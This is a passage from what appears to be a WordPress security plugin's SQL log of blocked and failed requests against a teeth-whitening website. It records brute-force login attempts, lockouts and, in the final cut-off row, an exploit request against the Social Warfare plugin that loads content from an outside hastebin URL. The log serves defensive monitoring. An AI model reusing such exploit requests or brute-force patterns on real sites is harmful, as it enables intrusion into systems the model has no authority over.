rv:62.0) Gecko/20100101 Firefox/62.0','loginFailValidUsername',NULL,NULL),(7762,0.000000,1629461421.560068,'\0\0\0\0\0\0\0\0\0\0���~d',0,200,0,0,0,'https://teethwhiteningproduct.co.uk/wp-login.php','','Mozilla/5.0','loginFailInvalidUsername',NULL,NULL),(7763,0.000000,1629461469.662383,'\0\0\0\0\0\0\0\0\0\0���~d',0,200,0,0,0,'https://teethwhiteningproduct.co.uk/wp-login.php','','Mozilla/5.0','loginFailInvalidUsername',NULL,NULL),(7764,0.000000,1629461518.047256,'\0\0\0\0\0\0\0\0\0\0���~d',0,200,0,0,0,'https://teethwhiteningproduct.co.uk/wp-login.php','','Mozilla/5.0','loginFailInvalidUsername',NULL,NULL),(7765,0.000000,1629461567.944720,'\0\0\0\0\0\0\0\0\0\0���~d',0,200,0,0,0,'https://teethwhiteningproduct.co.uk/wp-login.php','','Mozilla/5.0','loginFailInvalidUsername',NULL,NULL),(7766,0.000000,1629461615.848702,'\0\0\0\0\0\0\0\0\0\0���~d',0,200,0,0,0,'https://teethwhiteningproduct.co.uk/wp-login.php','','Mozilla/5.0','loginFailInvalidUsername',NULL,NULL),(7767,0.000000,1629461663.852155,'\0\0\0\0\0\0\0\0\0\0���~d',0,200,0,0,0,'https://teethwhiteningproduct.co.uk/wp-login.php','','Mozilla/5.0','loginFailInvalidUsername',NULL,NULL),(7768,0.000000,1629461712.560973,'\0\0\0\0\0\0\0\0\0\0���~d',0,200,0,0,0,'https://teethwhiteningproduct.co.uk/wp-login.php','','Mozilla/5.0','loginFailInvalidUsername',NULL,NULL),(7769,0.000000,1629461827.916115,'\0\0\0\0\0\0\0\0\0\0���~d',0,200,0,0,0,'https://teethwhiteningproduct.co.uk/wp-login.php','','Mozilla/5.0','loginFailInvalidUsername',NULL,NULL),(7770,0.000000,1629461872.775702,'\0\0\0\0\0\0\0\0\0\0���~d',0,200,0,0,0,'https://teethwhiteningproduct.co.uk/wp-login.php','','Mozilla/5.0','loginFailInvalidUsername',NULL,NULL),(7771,0.000000,1629461921.801847,'\0\0\0\0\0\0\0\0\0\0���~d',0,200,0,0,0,'https://teethwhiteningproduct.co.uk/wp-login.php','','Mozilla/5.0','loginFailInvalidUsername',NULL,NULL),(7772,0.000000,1629461924.466388,'\0\0\0\0\0\0\0\0\0\0��ár�',0,200,0,1,0,'https://teethwhiteningproduct.co.uk/xmlrpc.php','','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0','loginFailValidUsername',NULL,NULL),(7773,0.000000,1629461972.983265,'\0\0\0\0\0\0\0\0\0\0���~d',0,200,0,0,0,'https://teethwhiteningproduct.co.uk/wp-login.php','','Mozilla/5.0','loginFailInvalidUsername',NULL,NULL),(7774,0.000000,1629462025.437347,'\0\0\0\0\0\0\0\0\0\0���~d',0,200,0,0,0,'https://teethwhiteningproduct.co.uk/wp-login.php','','Mozilla/5.0','loginFailInvalidUsername',NULL,NULL),(7775,0.000000,1629462076.658693,'\0\0\0\0\0\0\0\0\0\0���~d',0,200,0,0,0,'https://teethwhiteningproduct.co.uk/wp-login.php','','Mozilla/5.0','loginFailInvalidUsername',NULL,NULL),(7776,0.000000,1629462126.346784,'\0\0\0\0\0\0\0\0\0\0���~d',0,200,0,0,0,'https://teethwhiteningproduct.co.uk/wp-login.php','','Mozilla/5.0','loginFailInvalidUsername',NULL,NULL),(7777,0.000000,1629462178.401431,'\0\0\0\0\0\0\0\0\0\0���~d',0,200,0,0,0,'https://teethwhiteningproduct.co.uk/wp-login.php','','Mozilla/5.0','loginFailInvalidUsername',NULL,NULL),(7778,0.000000,1629462228.087667,'\0\0\0\0\0\0\0\0\0\0���~d',0,503,0,0,0,'https://teethwhiteningproduct.co.uk/wp-login.php','','Mozilla/5.0','lockedOut','Exceeded the maximum number of login failures which is: 20. The last username they tried to sign in with was: \'teethwhiteningproduct\'',NULL),(7779,1629462434.835618,1629462434.750800,'\0\0\0\0\0\0\0\0\0\0���~d',0,503,0,0,0,'https://teethwhiteningproduct.co.uk/wp-login.php',NULL,'Mozilla/5.0','lockedOut','Exceeded the maximum number of login failures which is: 20. The last username they tried to sign in with was: \'teethwhiteningproduct\'','{\"learningMode\":0,\"failedRules\":\"\",\"paramKey\":\"\",\"paramValue\":\"\",\"path\":\"L3dwLWxvZ2luLnBocA==\"}'),(7780,1629462380.582890,1629462380.496400,'\0\0\0\0\0\0\0\0\0\0���~d',0,503,0,0,0,'https://teethwhiteningproduct.co.uk/wp-login.php',NULL,'Mozilla/5.0','lockedOut','Exceeded the maximum number of login failures which is: 20. The last username they tried to sign in with was: \'teethwhiteningproduct\'','{\"learningMode\":0,\"failedRules\":\"\",\"paramKey\":\"\",\"paramValue\":\"\",\"path\":\"L3dwLWxvZ2luLnBocA==\"}'),(7781,1629462329.676197,1629462329.480400,'\0\0\0\0\0\0\0\0\0\0���~d',0,503,0,0,0,'https://teethwhiteningproduct.co.uk/wp-login.php',NULL,'Mozilla/5.0','lockedOut','Exceeded the maximum number of login failures which is: 20. The last username they tried to sign in with was: \'teethwhiteningproduct\'','{\"learningMode\":0,\"failedRules\":\"\",\"paramKey\":\"\",\"paramValue\":\"\",\"path\":\"L3dwLWxvZ2luLnBocA==\"}'),(7782,1629462278.889105,1629462278.805200,'\0\0\0\0\0\0\0\0\0\0���~d',0,503,0,0,0,'https://teethwhiteningproduct.co.uk/wp-login.php',NULL,'Mozilla/5.0','lockedOut','Exceeded the maximum number of login failures which is: 20. The last username they tried to sign in with was: \'teethwhiteningproduct\'','{\"learningMode\":0,\"failedRules\":\"\",\"paramKey\":\"\",\"paramValue\":\"\",\"path\":\"L3dwLWxvZ2luLnBocA==\"}'),(7783,0.000000,1629462453.741187,'\0\0\0\0\0\0\0\0\0\0����~�',0,200,0,1,0,'https://teethwhiteningproduct.co.uk/xmlrpc.php','','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0','loginFailValidUsername',NULL,NULL),(7784,1629462489.587153,1629462489.225000,'\0\0\0\0\0\0\0\0\0\0���~d',0,503,0,0,0,'https://teethwhiteningproduct.co.uk/wp-login.php',NULL,'Mozilla/5.0','lockedOut','Exceeded the maximum number of login failures which is: 20. The last username they tried to sign in with was: \'teethwhiteningproduct\'','{\"learningMode\":0,\"failedRules\":\"\",\"paramKey\":\"\",\"paramValue\":\"\",\"path\":\"L3dwLWxvZ2luLnBocA==\"}'),(7785,1629462707.155910,1629462707.072700,'\0\0\0\0\0\0\0\0\0\0���~d',0,503,0,0,0,'https://teethwhiteningproduct.co.uk/wp-login.php',NULL,'Mozilla/5.0','lockedOut','Exceeded the maximum number of login failures which is: 20. The last username they tried to sign in with was: \'teethwhiteningproduct\'','{\"learningMode\":0,\"failedRules\":\"\",\"paramKey\":\"\",\"paramValue\":\"\",\"path\":\"L3dwLWxvZ2luLnBocA==\"}'),(7786,1629462653.800782,1629462653.715800,'\0\0\0\0\0\0\0\0\0\0���~d',0,503,0,0,0,'https://teethwhiteningproduct.co.uk/wp-login.php',NULL,'Mozilla/5.0','lockedOut','Exceeded the maximum number of login failures which is: 20. The last username they tried to sign in with was: \'teethwhiteningproduct\'','{\"learningMode\":0,\"failedRules\":\"\",\"paramKey\":\"\",\"paramValue\":\"\",\"path\":\"L3dwLWxvZ2luLnBocA==\"}'),(7787,1629462597.938256,1629462597.847800,'\0\0\0\0\0\0\0\0\0\0���~d',0,503,0,0,0,'https://teethwhiteningproduct.co.uk/wp-login.php',NULL,'Mozilla/5.0','lockedOut','Exceeded the maximum number of login failures which is: 20. The last username they tried to sign in with was: \'teethwhiteningproduct\'','{\"learningMode\":0,\"failedRules\":\"\",\"paramKey\":\"\",\"paramValue\":\"\",\"path\":\"L3dwLWxvZ2luLnBocA==\"}'),(7788,1629462544.929784,1629462544.838200,'\0\0\0\0\0\0\0\0\0\0���~d',0,503,0,0,0,'https://teethwhiteningproduct.co.uk/wp-login.php',NULL,'Mozilla/5.0','lockedOut','Exceeded the maximum number of login failures which is: 20. The last username they tried to sign in with was: \'teethwhiteningproduct\'','{\"learningMode\":0,\"failedRules\":\"\",\"paramKey\":\"\",\"paramValue\":\"\",\"path\":\"L3dwLWxvZ2luLnBocA==\"}'),(7789,1629462812.249634,1629462811.999500,'\0\0\0\0\0\0\0\0\0\0���~d',0,503,0,0,0,'https://teethwhiteningproduct.co.uk/wp-login.php',NULL,'Mozilla/5.0','lockedOut','Exceeded the maximum number of login failures which is: 20. The last username they tried to sign in with was: \'teethwhiteningproduct\'','{\"learningMode\":0,\"failedRules\":\"\",\"paramKey\":\"\",\"paramValue\":\"\",\"path\":\"L3dwLWxvZ2luLnBocA==\"}'),(7790,1629462759.916625,1629462759.793900,'\0\0\0\0\0\0\0\0\0\0���~d',0,503,0,0,0,'https://teethwhiteningproduct.co.uk/wp-login.php',NULL,'Mozilla/5.0','lockedOut','Exceeded the maximum number of login failures which is: 20. The last username they tried to sign in with was: \'teethwhiteningproduct\'','{\"learningMode\":0,\"failedRules\":\"\",\"paramKey\":\"\",\"paramValue\":\"\",\"path\":\"L3dwLWxvZ2luLnBocA==\"}'),(7791,1629463368.063060,1629463367.962800,'\0\0\0\0\0\0\0\0\0\0���~d',0,503,0,0,0,'https://teethwhiteningproduct.co.uk/wp-login.php',NULL,'Mozilla/5.0','lockedOut','Exceeded the maximum number of login failures which is: 20. The last username they tried to sign in with was: \'teethwhiteningproduct\'','{\"learningMode\":0,\"failedRules\":\"\",\"paramKey\":\"\",\"paramValue\":\"\",\"path\":\"L3dwLWxvZ2luLnBocA==\"}'),(7792,1629463301.323481,1629463301.224100,'\0\0\0\0\0\0\0\0\0\0���~d',0,503,0,0,0,'https://teethwhiteningproduct.co.uk/wp-login.php',NULL,'Mozilla/5.0','lockedOut','Exceeded the maximum number of login failures which is: 20. The last username they tried to sign in with was: \'teethwhiteningproduct\'','{\"learningMode\":0,\"failedRules\":\"\",\"paramKey\":\"\",\"paramValue\":\"\",\"path\":\"L3dwLWxvZ2luLnBocA==\"}'),(7793,1629463243.938034,1629463243.855900,'\0\0\0\0\0\0\0\0\0\0���~d',0,503,0,0,0,'https://teethwhiteningproduct.co.uk/wp-login.php',NULL,'Mozilla/5.0','lockedOut','Exceeded the maximum number of login failures which is: 20. The last username they tried to sign in with was: \'teethwhiteningproduct\'','{\"learningMode\":0,\"failedRules\":\"\",\"paramKey\":\"\",\"paramValue\":\"\",\"path\":\"L3dwLWxvZ2luLnBocA==\"}'),(7794,1629463188.009801,1629463187.904900,'\0\0\0\0\0\0\0\0\0\0���~d',0,503,0,0,0,'https://teethwhiteningproduct.co.uk/wp-login.php',NULL,'Mozilla/5.0','lockedOut','Exceeded the maximum number of login failures which is: 20. The last username they tried to sign in with was: \'teethwhiteningproduct\'','{\"learningMode\":0,\"failedRules\":\"\",\"paramKey\":\"\",\"paramValue\":\"\",\"path\":\"L3dwLWxvZ2luLnBocA==\"}'),(7795,1629463134.002651,1629463133.641400,'\0\0\0\0\0\0\0\0\0\0���~d',0,503,0,0,0,'https://teethwhiteningproduct.co.uk/wp-login.php',NULL,'Mozilla/5.0','lockedOut','Exceeded the maximum number of login failures which is: 20. The last username they tried to sign in with was: \'teethwhiteningproduct\'','{\"learningMode\":0,\"failedRules\":\"\",\"paramKey\":\"\",\"paramValue\":\"\",\"path\":\"L3dwLWxvZ2luLnBocA==\"}'),(7796,1629463077.584132,1629463077.500900,'\0\0\0\0\0\0\0\0\0\0���~d',0,503,0,0,0,'https://teethwhiteningproduct.co.uk/wp-login.php',NULL,'Mozilla/5.0','lockedOut','Exceeded the maximum number of login failures which is: 20. The last username they tried to sign in with was: \'teethwhiteningproduct\'','{\"learningMode\":0,\"failedRules\":\"\",\"paramKey\":\"\",\"paramValue\":\"\",\"path\":\"L3dwLWxvZ2luLnBocA==\"}'),(7797,1629463023.976407,1629463023.889500,'\0\0\0\0\0\0\0\0\0\0���~d',0,503,0,0,0,'https://teethwhiteningproduct.co.uk/wp-login.php',NULL,'Mozilla/5.0','lockedOut','Exceeded the maximum number of login failures which is: 20. The last username they tried to sign in with was: \'teethwhiteningproduct\'','{\"learningMode\":0,\"failedRules\":\"\",\"paramKey\":\"\",\"paramValue\":\"\",\"path\":\"L3dwLWxvZ2luLnBocA==\"}'),(7798,1629462970.564010,1629462970.482000,'\0\0\0\0\0\0\0\0\0\0���~d',0,503,0,0,0,'https://teethwhiteningproduct.co.uk/wp-login.php',NULL,'Mozilla/5.0','lockedOut','Exceeded the maximum number of login failures which is: 20. The last username they tried to sign in with was: \'teethwhiteningproduct\'','{\"learningMode\":0,\"failedRules\":\"\",\"paramKey\":\"\",\"paramValue\":\"\",\"path\":\"L3dwLWxvZ2luLnBocA==\"}'),(7799,1629462915.944955,1629462915.862800,'\0\0\0\0\0\0\0\0\0\0���~d',0,503,0,0,0,'https://teethwhiteningproduct.co.uk/wp-login.php',NULL,'Mozilla/5.0','lockedOut','Exceeded the maximum number of login failures which is: 20. The last username they tried to sign in with was: \'teethwhiteningproduct\'','{\"learningMode\":0,\"failedRules\":\"\",\"paramKey\":\"\",\"paramValue\":\"\",\"path\":\"L3dwLWxvZ2luLnBocA==\"}'),(7800,1629462862.442391,1629462862.357700,'\0\0\0\0\0\0\0\0\0\0���~d',0,503,0,0,0,'https://teethwhiteningproduct.co.uk/wp-login.php',NULL,'Mozilla/5.0','lockedOut','Exceeded the maximum number of login failures which is: 20. The last username they tried to sign in with was: \'teethwhiteningproduct\'','{\"learningMode\":0,\"failedRules\":\"\",\"paramKey\":\"\",\"paramValue\":\"\",\"path\":\"L3dwLWxvZ2luLnBocA==\"}'),(7801,1629463428.899024,1629463428.813900,'\0\0\0\0\0\0\0\0\0\0���~d',0,503,0,0,0,'https://teethwhiteningproduct.co.uk/wp-login.php',NULL,'Mozilla/5.0','lockedOut','Exceeded the maximum number of login failures which is: 20. The last username they tried to sign in with was: \'teethwhiteningproduct\'','{\"learningMode\":0,\"failedRules\":\"\",\"paramKey\":\"\",\"paramValue\":\"\",\"path\":\"L3dwLWxvZ2luLnBocA==\"}'),(7802,0.000000,1629463443.165387,'\0\0\0\0\0\0\0\0\0\0��gZ�j',0,200,0,1,0,'https://teethwhiteningproduct.co.uk/xmlrpc.php','','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0','loginFailValidUsername',NULL,NULL),(7803,1629463941.705120,1629463941.420900,'\0\0\0\0\0\0\0\0\0\0���~d',0,503,0,0,0,'https://teethwhiteningproduct.co.uk/wp-login.php',NULL,'Mozilla/5.0','lockedOut','Exceeded the maximum number of login failures which is: 20. The last username they tried to sign in with was: \'teethwhiteningproduct\'','{\"learningMode\":0,\"failedRules\":\"\",\"paramKey\":\"\",\"paramValue\":\"\",\"path\":\"L3dwLWxvZ2luLnBocA==\"}'),(7804,1629463877.993430,1629463877.906300,'\0\0\0\0\0\0\0\0\0\0���~d',0,503,0,0,0,'https://teethwhiteningproduct.co.uk/wp-login.php',NULL,'Mozilla/5.0','lockedOut','Exceeded the maximum number of login failures which is: 20. The last username they tried to sign in with was: \'teethwhiteningproduct\'','{\"learningMode\":0,\"failedRules\":\"\",\"paramKey\":\"\",\"paramValue\":\"\",\"path\":\"L3dwLWxvZ2luLnBocA==\"}'),(7805,1629463819.170825,1629463819.082700,'\0\0\0\0\0\0\0\0\0\0���~d',0,503,0,0,0,'https://teethwhiteningproduct.co.uk/wp-login.php',NULL,'Mozilla/5.0','lockedOut','Exceeded the maximum number of login failures which is: 20. The last username they tried to sign in with was: \'teethwhiteningproduct\'','{\"learningMode\":0,\"failedRules\":\"\",\"paramKey\":\"\",\"paramValue\":\"\",\"path\":\"L3dwLWxvZ2luLnBocA==\"}'),(7806,1629463731.088988,1629463731.004600,'\0\0\0\0\0\0\0\0\0\0���~d',0,503,0,0,0,'https://teethwhiteningproduct.co.uk/wp-login.php',NULL,'Mozilla/5.0','lockedOut','Exceeded the maximum number of login failures which is: 20. The last username they tried to sign in with was: \'teethwhiteningproduct\'','{\"learningMode\":0,\"failedRules\":\"\",\"paramKey\":\"\",\"paramValue\":\"\",\"path\":\"L3dwLWxvZ2luLnBocA==\"}'),(7807,1629463644.577936,1629463644.494600,'\0\0\0\0\0\0\0\0\0\0���~d',0,503,0,0,0,'https://teethwhiteningproduct.co.uk/wp-login.php',NULL,'Mozilla/5.0','lockedOut','Exceeded the maximum number of login failures which is: 20. The last username they tried to sign in with was: \'teethwhiteningproduct\'','{\"learningMode\":0,\"failedRules\":\"\",\"paramKey\":\"\",\"paramValue\":\"\",\"path\":\"L3dwLWxvZ2luLnBocA==\"}'),(7808,1629463566.040896,1629463565.957300,'\0\0\0\0\0\0\0\0\0\0���~d',0,503,0,0,0,'https://teethwhiteningproduct.co.uk/wp-login.php',NULL,'Mozilla/5.0','lockedOut','Exceeded the maximum number of login failures which is: 20. The last username they tried to sign in with was: \'teethwhiteningproduct\'','{\"learningMode\":0,\"failedRules\":\"\",\"paramKey\":\"\",\"paramValue\":\"\",\"path\":\"L3dwLWxvZ2luLnBocA==\"}'),(7809,1629463495.405780,1629463495.320900,'\0\0\0\0\0\0\0\0\0\0���~d',0,503,0,0,0,'https://teethwhiteningproduct.co.uk/wp-login.php',NULL,'Mozilla/5.0','lockedOut','Exceeded the maximum number of login failures which is: 20. The last username they tried to sign in with was: \'teethwhiteningproduct\'','{\"learningMode\":0,\"failedRules\":\"\",\"paramKey\":\"\",\"paramValue\":\"\",\"path\":\"L3dwLWxvZ2luLnBocA==\"}'),(7810,0.000000,1629463996.989866,'\0\0\0\0\0\0\0\0\0\0��e%�',0,200,0,1,0,'https://teethwhiteningproduct.co.uk/xmlrpc.php','','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0','loginFailValidUsername',NULL,NULL),(7811,1629464084.467320,1629464084.385000,'\0\0\0\0\0\0\0\0\0\0���~d',0,503,0,0,0,'https://teethwhiteningproduct.co.uk/wp-login.php',NULL,'Mozilla/5.0','lockedOut','Exceeded the maximum number of login failures which is: 20. The last username they tried to sign in with was: \'teethwhiteningproduct\'','{\"learningMode\":0,\"failedRules\":\"\",\"paramKey\":\"\",\"paramValue\":\"\",\"path\":\"L3dwLWxvZ2luLnBocA==\"}'),(7812,1629464013.328611,1629464013.218000,'\0\0\0\0\0\0\0\0\0\0���~d',0,503,0,0,0,'https://teethwhiteningproduct.co.uk/wp-login.php',NULL,'Mozilla/5.0','lockedOut','Exceeded the maximum number of login failures which is: 20. The last username they tried to sign in with was: \'teethwhiteningproduct\'','{\"learningMode\":0,\"failedRules\":\"\",\"paramKey\":\"\",\"paramValue\":\"\",\"path\":\"L3dwLWxvZ2luLnBocA==\"}'),(7813,0.000000,1629464505.923874,'\0\0\0\0\0\0\0\0\0\0���c{)',0,200,0,1,0,'https://teethwhiteningproduct.co.uk/xmlrpc.php','','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0','loginFailValidUsername',NULL,NULL),(7814,0.000000,1629465020.823927,'\0\0\0\0\0\0\0\0\0\0��H\n��',0,200,0,1,0,'https://teethwhiteningproduct.co.uk/xmlrpc.php','','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0','loginFailValidUsername',NULL,NULL),(7815,0.000000,1629465537.658554,'\0\0\0\0\0\0\0\0\0\0��g�p',0,200,0,1,0,'https://teethwhiteningproduct.co.uk/xmlrpc.php','','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0','loginFailValidUsername',NULL,NULL),(7816,0.000000,1629466051.315274,'\0\0\0\0\0\0\0\0\0\0��>��G',0,200,0,1,0,'https://teethwhiteningproduct.co.uk/xmlrpc.php','','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0','loginFailValidUsername',NULL,NULL),(7817,0.000000,1629469471.014094,'\0\0\0\0\0\0\0\0\0\0�����',0,200,0,1,0,'https://teethwhiteningproduct.co.uk/wp-login.php','','Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/32.0.1700.107 Safari/537.36','loginFailValidUsername',NULL,NULL),(7818,0.000000,1629471004.901583,'\0\0\0\0\0\0\0\0\0\0���ŝ',0,200,0,1,0,'https://teethwhiteningproduct.co.uk/wp-login.php','','Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/64.0.3282.140 Safari/537.36','loginFailValidUsername',NULL,NULL),(7819,0.000000,1629471784.107884,'\0\0\0\0\0\0\0\0\0\0��?���',0,200,0,0,0,'https://www.teethwhiteningproduct.co.uk/wp-login.php','','Mozilla/5.0 (iPhone; CPU iPhone OS 7_1_2 like Mac OS X) AppleWebKit/537.51.2 (KHTML, like Gecko) Version/7.0 Mobile/11D257 Safari/9537.53','loginFailInvalidUsername',NULL,NULL),(7820,0.000000,1629472534.503463,'\0\0\0\0\0\0\0\0\0\0���2��',0,200,0,1,0,'https://teethwhiteningproduct.co.uk/wp-login.php','','Mozilla/5.0 (Windows NT 6.3; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/79.0.3945.130 Safari/537.36','loginFailValidUsername',NULL,NULL),(7821,0.000000,1629473655.020059,'\0\0\0\0\0\0\0\0\0\0����|',0,200,0,1,0,'https://teethwhiteningproduct.co.uk//xmlrpc.php','','Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/79.0 Safari/537.36','loginFailValidUsername',NULL,NULL),(7822,0.000000,1629473656.224341,'\0\0\0\0\0\0\0\0\0\0����|',0,200,0,1,0,'https://teethwhiteningproduct.co.uk//xmlrpc.php','','Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/79.0 Safari/537.36','loginFailValidUsername',NULL,NULL),(7823,0.000000,1629473657.522076,'\0\0\0\0\0\0\0\0\0\0����|',0,200,0,1,0,'https://teethwhiteningproduct.co.uk//xmlrpc.php','','Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/79.0 Safari/537.36','loginFailValidUsername',NULL,NULL),(7824,0.000000,1629473658.620427,'\0\0\0\0\0\0\0\0\0\0����|',0,200,0,1,0,'https://teethwhiteningproduct.co.uk//xmlrpc.php','','Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/79.0 Safari/537.36','loginFailValidUsername',NULL,NULL),(7825,0.000000,1629473659.960035,'\0\0\0\0\0\0\0\0\0\0����|',0,200,0,1,0,'https://teethwhiteningproduct.co.uk//xmlrpc.php','','Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/79.0 Safari/537.36','loginFailValidUsername',NULL,NULL),(7826,0.000000,1629473661.046676,'\0\0\0\0\0\0\0\0\0\0����|',0,200,0,1,0,'https://teethwhiteningproduct.co.uk//xmlrpc.php','','Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/79.0 Safari/537.36','loginFailValidUsername',NULL,NULL),(7827,0.000000,1629473663.934050,'\0\0\0\0\0\0\0\0\0\0����|',0,200,0,1,0,'https://teethwhiteningproduct.co.uk//xmlrpc.php','','Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/79.0 Safari/537.36','loginFailValidUsername',NULL,NULL),(7828,0.000000,1629473666.347703,'\0\0\0\0\0\0\0\0\0\0����|',0,200,0,1,0,'https://teethwhiteningproduct.co.uk//xmlrpc.php','','Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/79.0 Safari/537.36','loginFailValidUsername',NULL,NULL),(7829,0.000000,1629473668.459552,'\0\0\0\0\0\0\0\0\0\0����|',0,200,0,1,0,'https://teethwhiteningproduct.co.uk//xmlrpc.php','','Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/79.0 Safari/537.36','loginFailValidUsername',NULL,NULL),(7830,0.000000,1629473669.628242,'\0\0\0\0\0\0\0\0\0\0����|',0,200,0,1,0,'https://teethwhiteningproduct.co.uk//xmlrpc.php','','Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/79.0 Safari/537.36','loginFailValidUsername',NULL,NULL),(7831,0.000000,1629473670.910012,'\0\0\0\0\0\0\0\0\0\0����|',0,200,0,1,0,'https://teethwhiteningproduct.co.uk//xmlrpc.php','','Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/79.0 Safari/537.36','loginFailValidUsername',NULL,NULL),(7832,0.000000,1629473674.571871,'\0\0\0\0\0\0\0\0\0\0����|',0,200,0,1,0,'https://teethwhiteningproduct.co.uk//xmlrpc.php','','Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/79.0 Safari/537.36','loginFailValidUsername',NULL,NULL),(7833,0.000000,1629473677.408186,'\0\0\0\0\0\0\0\0\0\0����|',0,200,0,1,0,'https://teethwhiteningproduct.co.uk//xmlrpc.php','','Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/79.0 Safari/537.36','loginFailValidUsername',NULL,NULL),(7834,0.000000,1629473681.287304,'\0\0\0\0\0\0\0\0\0\0����|',0,200,0,1,0,'https://teethwhiteningproduct.co.uk//xmlrpc.php','','Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/79.0 Safari/537.36','loginFailValidUsername',NULL,NULL),(7835,0.000000,1629473684.222104,'\0\0\0\0\0\0\0\0\0\0����|',0,200,0,1,0,'https://teethwhiteningproduct.co.uk//xmlrpc.php','','Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/79.0 Safari/537.36','loginFailValidUsername',NULL,NULL),(7836,0.000000,1629473686.968249,'\0\0\0\0\0\0\0\0\0\0����|',0,200,0,1,0,'https://teethwhiteningproduct.co.uk//xmlrpc.php','','Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/79.0 Safari/537.36','loginFailValidUsername',NULL,NULL),(7837,0.000000,1629473689.100305,'\0\0\0\0\0\0\0\0\0\0����|',0,200,0,1,0,'https://teethwhiteningproduct.co.uk//xmlrpc.php','','Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/79.0 Safari/537.36','loginFailValidUsername',NULL,NULL),(7838,0.000000,1629473691.424963,'\0\0\0\0\0\0\0\0\0\0����|',0,200,0,1,0,'https://teethwhiteningproduct.co.uk//xmlrpc.php','','Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/79.0 Safari/537.36','loginFailValidUsername',NULL,NULL),(7839,0.000000,1629473694.247373,'\0\0\0\0\0\0\0\0\0\0����|',0,503,0,0,0,'https://teethwhiteningproduct.co.uk//xmlrpc.php','','Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/79.0 Safari/537.36','lockedOut','Exceeded the maximum number of login failures which is: 20. The last username they tried to sign in with was: \'admin\'',NULL),(7840,0.000000,1629474075.728099,'\0\0\0\0\0\0\0\0\0\0���/�\"',0,200,0,1,0,'https://teethwhiteningproduct.co.uk/wp-login.php','','Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/51.0.2704.106 Safari/537.36','loginFailValidUsername',NULL,NULL),(7841,0.000000,1629475630.542776,'\0\0\0\0\0\0\0\0\0\0���]n\'',0,200,0,1,0,'https://teethwhiteningproduct.co.uk/wp-login.php','','Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/79.0.3945.130 Safari/537.36','loginFailValidUsername',NULL,NULL),(7842,0.000000,1629476969.908730,'\0\0\0\0\0\0\0\0\0\0��Ғ�',0,200,0,1,0,'https://teethwhiteningproduct.co.uk/xmlrpc.php','','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0','loginFailValidUsername',NULL,NULL),(7843,1629477030.926848,1629477030.839600,'\0\0\0\0\0\0\0\0\0\0��1\"��',0,403,0,0,0,'https://teethwhiteningproduct.co.uk/wp-admin/admin-post.php?swp_debug=load_options&swp_url=https%3A%2F%2Fhastebin.com%2Fraw%2Fetonipusij',NULL,'Mozilla/5.0 (X11; Ubuntu; Linux i686; rv:28.0) Gecko/20100101 Firefox/28.0','blocked:waf','Social Warfare <= 3.5.2 - Unauthenticated Stored Cross-Site 